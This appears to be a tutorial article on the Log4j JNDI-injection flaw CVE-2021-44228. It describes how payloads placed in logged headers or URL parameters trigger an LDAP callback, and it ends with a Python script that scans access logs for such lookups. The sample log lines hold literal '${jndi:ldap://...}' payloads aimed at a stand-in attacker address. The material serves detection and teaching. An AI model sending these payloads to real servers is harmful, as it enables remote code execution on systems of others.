This article is dedicated to Log4j and how it is being exploited in the wild by attackers.
Apache Log4j, a project of the Apache Software Foundation, is a Java-based logging utility. It is written in Java and is one of several widely used Java logging frameworks.
A zero-day vulnerability was discovered that affects the Java logging package Log4j and has been assigned CVE-2021-44228. It allows attackers to execute code remotely on the web server and carries a CVSS score of a perfect 10, making it one of the most critical vulnerabilities.
Java is considered the #1 developer platform worldwide and runs on over 3 billion devices. The number of devices running Log4j can be estimated in the millions, if not billions. This makes it an attractive attack surface for attackers.
There are different ways to exploit this vulnerability. The payload can be injected into one of the HTTP headers that the server logs, or passed as part of a URL parameter.
Commonly logged headers include User-Agent and custom headers such as X-Forwarded-For.
For this attack method we have access to the log files, which has made it easier for us to see which inputs are logged and thus to exploit this vulnerability.
Looking at the log files, we find that the /admin/cores endpoint expects a parameter. As no parameter had been passed previously, the param parameter is empty (i.e., param={}).
Now that we have this knowledge, we can supply a payload in an arbitrary parameter to the /admin/cores endpoint.
The general payload used to abuse the Log4j zero-day relies on JNDI. JNDI (Java Naming and Directory Interface) is, in general, an API for naming and directory services. LDAP can be used as the JNDI backend, so the lookup can be made to call back to your attacker machine.
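Because the injection points described above (logged headers and URL parameters) all end up in the web server's access log, the same log can be scanned for JNDI lookup strings. The following detection script is an added example and not part of the original article; it assumes an Apache combined-style log format extended with the X-Forwarded-For header as the last quoted field, and the log lines and 203.0.113.x addresses in it are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined format plus a trailing
# quoted X-Forwarded-For field). Addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET /admin/cores?foo=bar HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"
10.0.0.9 - - [10/Dec/2021:13:01:09 +0000] "GET /admin/cores?foo=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1" 200 512 "-" "curl/7.68.0" "-"
10.0.0.7 - - [10/Dec/2021:13:02:11 +0000] "GET /solr/ HTTP/1.1" 200 512 "-" "${JNDI:ldap://203.0.113.10:1389/b}" "-"
10.0.0.8 - - [10/Dec/2021:13:03:00 +0000] "GET /admin/cores?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fc%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0" "${jndi:ldap://203.0.113.10/d}"
"""

# One access-log line: client, identd, user, [timestamp], "request", status, size,
# "referer", "user-agent", "x-forwarded-for".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)

# A Log4j lookup starts with "${jndi:" (case-insensitive; whitespace tolerated).
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def find_jndi_lookups(log_text):
    """Return (client_ip, field_name, decoded_value) for every logged
    request field (URL, User-Agent, X-Forwarded-For, Referer) that carries
    a JNDI lookup string. Values are URL-decoded first so that
    percent-encoded lookups in query parameters are not missed."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        fields = {
            "url": m.group("target"),
            "user_agent": m.group("ua"),
            "x_forwarded_for": m.group("xff"),
            "referer": m.group("referer"),
        }
        for name, raw in fields.items():
            decoded = unquote(raw)
            if JNDI_RE.search(decoded):
                hits.append((m.group("client"), name, decoded))
    return hits


if __name__ == "__main__":
    for client, field, value in find_jndi_lookups(SAMPLE_LOG):
        print(f"{client}\t{field}\t{value}")
```

Hits are indicators to investigate (the decoded value shows which host the lookup would contact); they complement, but do not replace, upgrading Log4j to a fixed release.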